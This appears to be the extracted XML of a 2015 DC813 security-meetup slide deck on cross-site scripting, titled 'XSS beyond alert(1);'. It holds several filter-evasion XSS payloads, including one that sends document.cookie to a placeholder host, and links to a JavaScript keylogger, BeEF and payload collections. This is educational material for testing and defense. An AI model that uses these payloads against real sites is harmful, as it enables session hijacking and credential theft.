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Cross site scripting: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-Scripts that you can inject into web pages, to affect other clients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-Some examples, with some evasion techniques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%00 null byte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%09 line feed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xsser.03c8.net/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DanMcInerney/xsscrapy" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/download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ortcullislabs/xssshell-xsstunnel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0" y="744575"/>
            <a:ext cx="8520599" cy="165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XSS beyond alert(1);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 I do now?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248150" y="4184725"/>
            <a:ext cx="460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Bill Davison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DC813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10/01/2015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XSS?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/>
              <a:t>alert(‘xss’)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/>
              <a:t>prompt(‘xss’)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/>
              <a:t>%00&lt;script&gt; document.write('&lt;img src="http://ip/?'+document.cookie+' "/&gt;');&lt;/script&gt;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/>
              <a:t>&lt;img %09onerror=alert(‘xss’) src=”a.net/pic.gif”&gt;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/>
              <a:t>&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;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/>
              <a:t>etc.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1996500"/>
            <a:ext cx="8260799" cy="68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What about XSS and CSRF?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3564350"/>
            <a:ext cx="8520599" cy="100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Finding XSS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XSSer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OWASP's Xenotix Fx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XSScrapy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Burp Suite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Basic cookie stealing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(https://pentesterlab.com/exercises/xss_and_mysql_file)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XSS Tunnel, XSS Shell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https://github.com/portcullislabs/xssshell-xsstunnell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(No demo)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XSS Payloads http://www.xss-payloads.com/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443800" y="1115225"/>
            <a:ext cx="7388400" cy="345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100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Javascript Keylogger http://www.xss-payloads.com/payloads/JavascriptKeylogger1.4.zip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Network Scanner http://www.xss-payloads.com/payloads/scripts/websocketsnetworkscan.js.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CSRF with XSS http://rileykidd.com/2013/09/09/using-xss-to-csrf/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900" y="411410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900" y="1319750"/>
            <a:ext cx="1998999" cy="19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3314100" y="1274600"/>
            <a:ext cx="1150500" cy="68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BeEF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Links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599" cy="3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https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet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https://web.archive.org/web/20120911044754/http://ha.ckers.org/xss.html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https://github.com/vanilla/htmlawed/blob/master/tests/fixtures/xss-evasion.txt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http://www.xss-payloads.com/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http://www.thisislegal.com/tutorials/19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http://rileykidd.com/2013/09/09/using-xss-to-csrf/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https://pentesterlab.com/exercises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https://sathisharthars.wordpress.com/2014/07/23/integrating-metasploit-with-browser-exploitation-framework/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